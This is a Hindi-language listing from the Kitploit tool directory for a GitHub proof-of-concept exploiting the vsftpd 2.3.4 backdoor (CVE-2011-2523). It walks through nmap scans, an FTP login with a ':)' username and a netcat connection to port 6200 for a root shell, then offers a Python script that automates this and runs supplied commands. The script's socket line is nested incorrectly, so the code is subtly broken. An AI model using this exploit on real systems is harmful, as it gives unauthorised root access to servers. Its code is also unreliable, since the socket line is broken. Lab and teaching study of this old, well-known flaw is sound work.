Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
vsftpd-2.3.4---Backdoor-Command-Execution — vsftpd 2.3.4 (CVE-2011-2523) एक गंभीर भेद्यता है जो Reverse Root Shell की ओर ले जाती है। इस रिपॉजिटरी में मैं चरण-दर-चरण, मैन्युअल और स्वचालित रूप से (Python) इसका एक्सप्लॉइट करने के लिए एक PoC बनाऊँगा, जो केवल शैक्षिक उद्देश्यों के लिए है। | Kitploit
उपकरण/GitHubGitHub/tshaq17/vsftpd-2.3.4---backdoor-command-execution
पेलोड जनरेशनभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubtshaq17/vsftpd-2.3.4---backdoor-command-execution

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) एक गंभीर भेद्यता है जो Reverse Root Shell की ओर ले जाती है। इस रिपॉजिटरी में मैं चरण-दर-चरण, मैन्युअल और स्वचालित रूप से (Python) इसका एक्सप्लॉइट करने के लिए एक PoC बनाऊँगा, जो केवल शैक्षिक उद्देश्यों के लिए है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
6 महीने पहलेअभी तक समीक्षित नहीं

vsftpd-2.3.4---Backdoor-Command-Execution

vsftpd 2.3.4 (CVE-2011-2523) एक गंभीर भेद्यता है जो रूट शेल तक ले जाती है। इस रिपॉजिटरी में मैं शैक्षिक उद्देश्यों के लिए इसे चरण दर चरण मैन्युअल रूप से और स्वचालित रूप से (Python) एक्सप्लॉइट करने का PoC दूँगा।

यह भेद्यता किस बारे में है? सबसे पहले, यह एक सर्वर-साइड एक्सप्लॉइट है इसलिए हम इसे दूरस्थ रूप से एक्सप्लॉइट करेंगे। विचार यह है कि जब आप डिफ़ॉल्ट रूप से पोर्ट 21 पर FTP सेवा से एक ऐसे उपयोगकर्ता नाम के साथ कनेक्ट करते हैं जिसमें :) होता है, तो यह सिस्टम को पोर्ट 6200 पर एक TCP पोर्ट खोलने के लिए ट्रिगर करेगा जिसमें रूट शेल होगा, इसलिए कोई भी उससे कनेक्ट कर सकता है और लक्ष्य सर्वर तक रूट एक्सेस प्राप्त कर सकता है, जो एक आपदा है। तो आइए इसे व्यावहारिक रूप से चरण दर चरण करें। मैं पहले इसे मैन्युअल रूप से समझाऊँगा ताकि पूरी जानकारी मिल जाए, फिर एक Python स्क्रिप्ट है जो इसे स्वचालित रूप से एक्सप्लॉइट करती है।

मैन्युअल रूप से

पोर्ट स्कैनिंग

  1. पोर्ट 21 खुला है
root@kitploit:~
nmap -p21 -sV -sC -O Target_IP 
छवि
  1. पोर्ट 6200 बंद है
root@kitploit:~
nmap -p6200 Target_IP
  • पोर्ट 6200 अभी के लिए बंद है छवि

एक्सप्लॉइटेशन

  1. FTP सेवा से कनेक्ट करें और सिस्टम को पोर्ट 6200 खोलने के लिए ट्रिगर करने हेतु एक दुर्भावनापूर्ण उपयोगकर्ता नाम का उपयोग करें
root@kitploit:~
ftp Target_IP 
  • उपयोगकर्ता नाम: कुछ भी:)
  • पासवर्ड: कुछ भी छवि
  1. FTP कनेक्शन के बाद पोर्ट 6200 जाँचें
root@kitploit:~
nmap -p6200 Target_IP

पोर्ट 6200 अब खुला है, इसलिए यह हमारा बैकडोर है

छवि
  1. पूरे सर्वर पर रूट शेल प्राप्त करने के लिए पोर्ट 6200 से कनेक्ट करें
root@kitploit:~
nc -nv Target_IP 6200

अंत में, हमारे पास लक्ष्य मशीन पर रूट शेल है। छवि


स्वचालित रूप से

मैन्युअल रूप से करने के बाद हम एक्सप्लॉइट के चरणों को जानते हैं:

  1. FTP सर्वर से पोर्ट (21) पर कनेक्ट करें।
  2. बैकडोर ट्रिगर करने के लिए :) युक्त उपयोगकर्ता नाम का उपयोग करें।
  3. पोर्ट (6200) से कनेक्ट करें।
root@kitploit:~
#!/usr/bin/python3 

from ftplib import FTP
import socket
import sys
import time

Target_IP = sys.argv[1]
cmd = sys.argv[2]

# Step1: Connect to FTP
try:
  ftp = FTP(Target_IP,timeout=2)
  ftp.login("user:)","password") # Step2: Send the malicious username
except:
  pass

time.sleep(1) # To give a time for the server to open the port (6200)

#Step3: Connect to port (6200) to have a Root Shell
shell = socket.socket(socket.socket(socket.AF_INET, socket.SOCK_STREAM))
try:
  shell.connect((Target_IP,6200))
except:
  print("Shell Failed")

#Execute the commands
shell.send(cmd.encode() + b"\n")
print(shell.recv(4096).decode())

#Finally close the connection
shell.close()
टूल डाउनलोड करें